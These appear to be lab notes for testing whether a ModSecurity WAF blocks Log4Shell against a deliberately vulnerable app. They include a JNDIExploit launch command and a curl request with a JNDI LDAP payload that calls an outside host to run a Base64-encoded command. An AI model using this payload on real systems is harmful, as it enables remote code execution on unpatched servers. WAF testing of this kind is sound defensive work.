docker stack deploy -c docker-compose.yml WAF
java -jar ./JNDIExploit-1.2-SNAPSHOT.jar -i $IP -p 8888
curl 127.0.0.1:80 -H 'X-Api-Version: ${jndi:ldap://$IP:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
1- 如何知道我的 WAF 和易受攻击的 Web 应用已启动?
执行 docker service ls ,检查是否有两个服务,每个各有一个副本。
2- 如何获取 modsec 日志?
执行 docker exec -ti $(docker container ls | grep "felipe8398/redirector:latest"| awk '{print $1}') cat /var/log/apache2/error.log
3- 如何确认 RCE 没有成功?
我们使用的 curl 会在 tmp 内创建一个名为 pwned 的文件,因此需要执行
docker exec -ti $(docker container ls | grep ghcr.io/christophetd/log4shell-vulnerable-app:latest | awk '{print $1}') ls /tmp